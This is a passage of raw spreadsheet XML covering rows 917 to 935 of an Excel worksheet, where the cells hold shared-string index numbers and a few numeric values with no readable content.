    <row r="917" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A917" s="12">
        <v>4838</v>
      </c>
      <c r="B917" s="12" t="s">
        <v>29157</v>
      </c>
      <c r="D917" s="12" t="s">
        <v>29158</v>
      </c>
      <c r="E917" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F917" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G917" s="12" t="s">
        <v>6928</v>
      </c>
      <c r="H917" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I917" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J917" s="12" t="s">
        <v>1943</v>
      </c>
      <c r="K917" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L917" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M917" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N917" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O917" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P917" s="12">
        <v>2.6</v>
      </c>
      <c r="Q917" s="12">
        <v>2.6</v>
      </c>
      <c r="R917" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S917" s="12" t="s">
        <v>6929</v>
      </c>
      <c r="T917" s="12" t="s">
        <v>6930</v>
      </c>
      <c r="U917" s="12" t="s">
        <v>6931</v>
      </c>
      <c r="V917" s="12" t="s">
        <v>1388</v>
      </c>
      <c r="W917" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X917" s="12">
        <v>4</v>
      </c>
      <c r="Y917" s="12" t="s">
        <v>6932</v>
      </c>
    </row>
    <row r="918" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A918" s="12">
        <v>4841</v>
      </c>
      <c r="B918" s="12" t="s">
        <v>29159</v>
      </c>
      <c r="D918" s="12" t="s">
        <v>29145</v>
      </c>
      <c r="E918" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F918" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G918" s="12" t="s">
        <v>6933</v>
      </c>
      <c r="H918" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I918" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J918" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K918" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L918" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M918" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N918" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O918" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P918" s="12" t="s">
        <v>6934</v>
      </c>
      <c r="Q918" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R918" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S918" s="12" t="s">
        <v>6935</v>
      </c>
      <c r="T918" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="U918" s="12" t="s">
        <v>6936</v>
      </c>
      <c r="V918" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W918" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X918" s="12">
        <v>4</v>
      </c>
      <c r="Y918" s="12" t="s">
        <v>6937</v>
      </c>
    </row>
    <row r="919" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A919" s="12">
        <v>4847</v>
      </c>
      <c r="B919" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D919" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F919" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G919" s="12" t="s">
        <v>6943</v>
      </c>
      <c r="H919" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I919" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J919" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K919" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L919" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M919" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N919" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O919" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P919" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q919" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R919" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S919" s="12" t="s">
        <v>6944</v>
      </c>
      <c r="T919" s="12" t="s">
        <v>6945</v>
      </c>
      <c r="U919" s="12" t="s">
        <v>6946</v>
      </c>
      <c r="V919" s="12" t="s">
        <v>4235</v>
      </c>
      <c r="W919" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X919" s="12">
        <v>8</v>
      </c>
      <c r="Y919" s="12" t="s">
        <v>6947</v>
      </c>
    </row>
    <row r="920" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A920" s="12">
        <v>4853</v>
      </c>
      <c r="B920" s="12" t="s">
        <v>29144</v>
      </c>
      <c r="C920" s="12" t="s">
        <v>29160</v>
      </c>
      <c r="D920" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E920" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F920" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G920" s="12" t="s">
        <v>6948</v>
      </c>
      <c r="H920" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I920" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J920" s="12" t="s">
        <v>591</v>
      </c>
      <c r="K920" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L920" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M920" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N920" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O920" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P920" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q920" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R920" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S920" s="12" t="s">
        <v>6949</v>
      </c>
      <c r="T920" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="U920" s="12" t="s">
        <v>6950</v>
      </c>
      <c r="V920" s="12" t="s">
        <v>4496</v>
      </c>
      <c r="W920" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X920" s="12">
        <v>13</v>
      </c>
      <c r="Y920" s="12" t="s">
        <v>6951</v>
      </c>
    </row>
    <row r="921" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A921" s="12">
        <v>4854</v>
      </c>
      <c r="B921" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C921" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D921" s="12" t="s">
        <v>29161</v>
      </c>
      <c r="E921" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F921" s="12" t="s">
        <v>29139</v>
      </c>
      <c r="G921" s="12" t="s">
        <v>6952</v>
      </c>
      <c r="H921" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I921" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J921" s="12" t="s">
        <v>1943</v>
      </c>
      <c r="K921" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L921" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M921" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N921" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O921" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P921" s="12" t="s">
        <v>6953</v>
      </c>
      <c r="Q921" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R921" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S921" s="12" t="s">
        <v>6954</v>
      </c>
      <c r="T921" s="12" t="s">
        <v>6722</v>
      </c>
      <c r="U921" s="12" t="s">
        <v>6955</v>
      </c>
      <c r="V921" s="12" t="s">
        <v>1388</v>
      </c>
      <c r="W921" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X921" s="12">
        <v>5</v>
      </c>
      <c r="Y921" s="12" t="s">
        <v>6956</v>
      </c>
    </row>
    <row r="922" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A922" s="12">
        <v>4857</v>
      </c>
      <c r="B922" s="12" t="s">
        <v>29162</v>
      </c>
      <c r="D922" s="12" t="s">
        <v>29163</v>
      </c>
      <c r="F922" s="12" t="s">
        <v>29164</v>
      </c>
      <c r="G922" s="12" t="s">
        <v>6957</v>
      </c>
      <c r="H922" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I922" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J922" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K922" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L922" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M922" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N922" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O922" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P922" s="12" t="s">
        <v>6958</v>
      </c>
      <c r="Q922" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R922" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S922" s="12" t="s">
        <v>6959</v>
      </c>
      <c r="T922" s="12" t="s">
        <v>6960</v>
      </c>
      <c r="U922" s="12" t="s">
        <v>6961</v>
      </c>
      <c r="V922" s="12" t="s">
        <v>4799</v>
      </c>
      <c r="W922" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X922" s="12">
        <v>2</v>
      </c>
      <c r="Y922" s="12" t="s">
        <v>6962</v>
      </c>
    </row>
    <row r="923" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A923" s="12">
        <v>4862</v>
      </c>
      <c r="B923" s="12" t="s">
        <v>29165</v>
      </c>
      <c r="D923" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F923" s="12" t="s">
        <v>29164</v>
      </c>
      <c r="G923" s="12" t="s">
        <v>6963</v>
      </c>
      <c r="H923" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I923" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J923" s="12" t="s">
        <v>6776</v>
      </c>
      <c r="K923" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L923" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M923" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N923" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O923" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P923" s="12" t="s">
        <v>6964</v>
      </c>
      <c r="Q923" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R923" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S923" s="12" t="s">
        <v>6965</v>
      </c>
      <c r="T923" s="12" t="s">
        <v>6966</v>
      </c>
      <c r="U923" s="12" t="s">
        <v>6967</v>
      </c>
      <c r="V923" s="12" t="s">
        <v>255</v>
      </c>
      <c r="W923" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X923" s="12">
        <v>4</v>
      </c>
      <c r="Y923" s="12" t="s">
        <v>6968</v>
      </c>
    </row>
    <row r="924" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A924" s="12">
        <v>4863</v>
      </c>
      <c r="B924" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C924" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D924" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E924" s="18" t="s">
        <v>31428</v>
      </c>
      <c r="F924" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G924" s="12" t="s">
        <v>6969</v>
      </c>
      <c r="H924" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I924" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J924" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K924" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L924" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M924" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N924" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O924" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P924" s="12" t="s">
        <v>6970</v>
      </c>
      <c r="Q924" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R924" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S924" s="12" t="s">
        <v>6971</v>
      </c>
      <c r="T924" s="12" t="s">
        <v>6972</v>
      </c>
      <c r="U924" s="12" t="s">
        <v>6973</v>
      </c>
      <c r="V924" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W924" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X924" s="12">
        <v>20</v>
      </c>
      <c r="Y924" s="12" t="s">
        <v>6974</v>
      </c>
    </row>
    <row r="925" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A925" s="12">
        <v>4865</v>
      </c>
      <c r="B925" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D925" s="12" t="s">
        <v>29139</v>
      </c>
      <c r="F925" s="12" t="s">
        <v>29164</v>
      </c>
      <c r="G925" s="12" t="s">
        <v>6975</v>
      </c>
      <c r="H925" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I925" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J925" s="12" t="s">
        <v>6776</v>
      </c>
      <c r="K925" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L925" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M925" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N925" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O925" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P925" s="12" t="s">
        <v>6908</v>
      </c>
      <c r="Q925" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R925" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S925" s="12" t="s">
        <v>6976</v>
      </c>
      <c r="T925" s="12" t="s">
        <v>4590</v>
      </c>
      <c r="U925" s="12" t="s">
        <v>6977</v>
      </c>
      <c r="V925" s="12" t="s">
        <v>255</v>
      </c>
      <c r="W925" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X925" s="12">
        <v>3</v>
      </c>
      <c r="Y925" s="12" t="s">
        <v>6978</v>
      </c>
    </row>
    <row r="926" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A926" s="12">
        <v>4866</v>
      </c>
      <c r="B926" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C926" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D926" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F926" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G926" s="12" t="s">
        <v>6979</v>
      </c>
      <c r="H926" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I926" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J926" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K926" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L926" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O926" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P926" s="12" t="s">
        <v>6536</v>
      </c>
      <c r="Q926" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R926" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S926" s="12" t="s">
        <v>6980</v>
      </c>
      <c r="T926" s="12" t="s">
        <v>6981</v>
      </c>
      <c r="U926" s="12" t="s">
        <v>6982</v>
      </c>
      <c r="V926" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W926" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X926" s="12">
        <v>12</v>
      </c>
      <c r="Y926" s="12" t="s">
        <v>6983</v>
      </c>
    </row>
    <row r="927" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A927" s="12">
        <v>4870</v>
      </c>
      <c r="B927" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D927" s="12" t="s">
        <v>29166</v>
      </c>
      <c r="E927" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F927" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G927" s="12" t="s">
        <v>6990</v>
      </c>
      <c r="H927" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I927" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J927" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K927" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L927" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O927" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P927" s="12" t="s">
        <v>6536</v>
      </c>
      <c r="Q927" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R927" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S927" s="12" t="s">
        <v>6991</v>
      </c>
      <c r="T927" s="12" t="s">
        <v>6992</v>
      </c>
      <c r="U927" s="12" t="s">
        <v>6993</v>
      </c>
      <c r="V927" s="12" t="s">
        <v>6660</v>
      </c>
      <c r="W927" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X927" s="12">
        <v>5</v>
      </c>
      <c r="Y927" s="12" t="s">
        <v>6994</v>
      </c>
    </row>
    <row r="928" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A928" s="12">
        <v>4899</v>
      </c>
      <c r="B928" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C928" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D928" s="12" t="s">
        <v>29148</v>
      </c>
      <c r="F928" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G928" s="12" t="s">
        <v>7013</v>
      </c>
      <c r="H928" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I928" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J928" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K928" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L928" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M928" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N928" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O928" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P928" s="12" t="s">
        <v>7014</v>
      </c>
      <c r="Q928" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R928" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S928" s="12" t="s">
        <v>7015</v>
      </c>
      <c r="T928" s="12" t="s">
        <v>7016</v>
      </c>
      <c r="U928" s="12" t="s">
        <v>7017</v>
      </c>
      <c r="V928" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W928" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X928" s="12">
        <v>4</v>
      </c>
      <c r="Y928" s="12" t="s">
        <v>7018</v>
      </c>
    </row>
    <row r="929" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A929" s="12">
        <v>4900</v>
      </c>
      <c r="B929" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C929" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D929" s="12" t="s">
        <v>29167</v>
      </c>
      <c r="E929" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F929" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G929" s="12" t="s">
        <v>7019</v>
      </c>
      <c r="H929" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I929" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J929" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K929" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L929" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M929" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N929" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O929" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P929" s="12" t="s">
        <v>6854</v>
      </c>
      <c r="Q929" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R929" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S929" s="12" t="s">
        <v>7020</v>
      </c>
      <c r="T929" s="12" t="s">
        <v>7021</v>
      </c>
      <c r="U929" s="12" t="s">
        <v>7022</v>
      </c>
      <c r="V929" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W929" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X929" s="12">
        <v>35</v>
      </c>
      <c r="Y929" s="12" t="s">
        <v>7023</v>
      </c>
    </row>
    <row r="930" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A930" s="12">
        <v>4907</v>
      </c>
      <c r="B930" s="12" t="s">
        <v>29168</v>
      </c>
      <c r="D930" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F930" s="12" t="s">
        <v>29169</v>
      </c>
      <c r="G930" s="12" t="s">
        <v>7028</v>
      </c>
      <c r="H930" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I930" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J930" s="12" t="s">
        <v>2575</v>
      </c>
      <c r="K930" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L930" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O930" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P930" s="12" t="s">
        <v>7025</v>
      </c>
      <c r="Q930" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R930" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S930" s="12" t="s">
        <v>7029</v>
      </c>
      <c r="T930" s="12" t="s">
        <v>7030</v>
      </c>
      <c r="U930" s="12" t="s">
        <v>2576</v>
      </c>
      <c r="V930" s="12" t="s">
        <v>5207</v>
      </c>
      <c r="W930" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X930" s="12">
        <v>0</v>
      </c>
      <c r="Y930" s="12" t="s">
        <v>7031</v>
      </c>
    </row>
    <row r="931" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A931" s="12">
        <v>4916</v>
      </c>
      <c r="B931" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C931" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D931" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E931" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F931" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G931" s="12" t="s">
        <v>7033</v>
      </c>
      <c r="H931" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I931" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J931" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K931" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L931" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O931" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P931" s="12" t="s">
        <v>6818</v>
      </c>
      <c r="Q931" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R931" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S931" s="12" t="s">
        <v>7034</v>
      </c>
      <c r="T931" s="12" t="s">
        <v>7035</v>
      </c>
      <c r="U931" s="12" t="s">
        <v>7036</v>
      </c>
      <c r="V931" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W931" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X931" s="12">
        <v>57</v>
      </c>
      <c r="Y931" s="12" t="s">
        <v>7037</v>
      </c>
    </row>
    <row r="932" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A932" s="12">
        <v>4917</v>
      </c>
      <c r="B932" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D932" s="12" t="s">
        <v>29170</v>
      </c>
      <c r="E932" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F932" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G932" s="12" t="s">
        <v>7038</v>
      </c>
      <c r="H932" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I932" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J932" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K932" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L932" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O932" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P932" s="12" t="s">
        <v>7039</v>
      </c>
      <c r="Q932" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R932" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S932" s="12" t="s">
        <v>7040</v>
      </c>
      <c r="T932" s="12" t="s">
        <v>7041</v>
      </c>
      <c r="U932" s="12" t="s">
        <v>7042</v>
      </c>
      <c r="V932" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W932" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X932" s="12">
        <v>14</v>
      </c>
      <c r="Y932" s="12" t="s">
        <v>7043</v>
      </c>
    </row>
    <row r="933" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A933" s="12">
        <v>4923</v>
      </c>
      <c r="B933" s="12" t="s">
        <v>29171</v>
      </c>
      <c r="D933" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E933" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F933" s="12" t="s">
        <v>29172</v>
      </c>
      <c r="G933" s="12" t="s">
        <v>7044</v>
      </c>
      <c r="H933" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I933" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J933" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K933" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L933" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O933" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P933" s="12" t="s">
        <v>7006</v>
      </c>
      <c r="Q933" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R933" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S933" s="12" t="s">
        <v>7045</v>
      </c>
      <c r="T933" s="12" t="s">
        <v>2645</v>
      </c>
      <c r="U933" s="12" t="s">
        <v>3269</v>
      </c>
      <c r="V933" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W933" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X933" s="12">
        <v>6</v>
      </c>
      <c r="Y933" s="12" t="s">
        <v>7046</v>
      </c>
    </row>
    <row r="934" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A934" s="12">
        <v>4939</v>
      </c>
      <c r="B934" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C934" s="12" t="s">
        <v>29173</v>
      </c>
      <c r="D934" s="12" t="s">
        <v>29146</v>
      </c>
      <c r="F934" s="12" t="s">
        <v>29146</v>
      </c>
      <c r="G934" s="12" t="s">
        <v>7052</v>
      </c>
      <c r="H934" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I934" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J934" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K934" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L934" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O934" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P934" s="12" t="s">
        <v>6854</v>
      </c>
      <c r="Q934" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R934" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S934" s="12" t="s">
        <v>7053</v>
      </c>
      <c r="T934" s="12" t="s">
        <v>7054</v>
      </c>
      <c r="U934" s="12" t="s">
        <v>7055</v>
      </c>
      <c r="V934" s="12" t="s">
        <v>19</v>
      </c>
      <c r="W934" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X934" s="12">
        <v>16</v>
      </c>
      <c r="Y934" s="12" t="s">
        <v>7056</v>
      </c>
    </row>
    <row r="935" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A935" s="12">
        <v>4940</v>
      </c>
      <c r="B935" s="12" t="s">
        <v>29171</v>
      </c>
      <c r="D935" s="12" t="s">
        <v>29158</v>
      </c>
      <c r="E935" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F935" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G935" s="12" t="s">
        <v>7057</v>
      </c>
      <c r="H935" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I935" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J935" s="12" t="s">
        <v>901</v>
      </c>
      <c r="K935" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L935" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M935" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N935" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O935" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P935" s="12" t="s">
        <v>7058</v>
      </c>
      <c r="Q935" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R935" s="12" t="s">
        <v>17</v>
      </c>
